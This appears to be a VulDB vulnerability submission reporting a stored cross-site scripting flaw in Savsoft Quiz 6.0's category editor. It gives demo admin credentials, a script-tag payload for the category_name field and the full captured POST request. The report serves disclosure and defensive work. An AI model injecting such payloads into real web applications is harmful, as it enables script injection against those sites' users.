| Title | Techkshetra Info Solutions Savsoft Quiz 6.0 Stored XSS |
|---|
| Description | Based on online demo :
https://savsoftquiz.com/web/index.php/online-demo/
Username: admin
Password: admin
and project open source :
https://github.com/Techkshetra/savsoftquizv6.0
Once Authenticated go to Settings > Category > in the Category list, call edit any category name, and add the following payload "><script>alert('XSS')</script>
It will trigger persistent XSS everywhere the category is displayed in the software.
The "category_name=" parameter is not sanitize and vulnerable to XSS.
Here the POST request I have:
POST /demo/savsoftquizv6.0/public/index.php/Qbank/editCategory HTTP/1.1
Host: demo.savsoftquiz.com
Content-Length: 111
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://demo.savsoftquiz.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.savsoftquiz.com/demo/sqv6/dist/dashboard.html
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: close
user_token=132-1-1713531035&id=1&category_name=Default%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&parent_id=0
|
|---|
| Source | ⚠️ https://demo.savsoftquiz.com/demo/sqv6/dist/dashboard.html |
|---|
| User | rubx (ID 62535) |
|---|
| Submission | 2024-04-19 15:12 (1 month ago) |
|---|
| Moderation | 2024-04-26 14:58 (7 days later) |
|---|
| Status | Przyjęty |
|---|
| VulDB Entry | 262148 |
|---|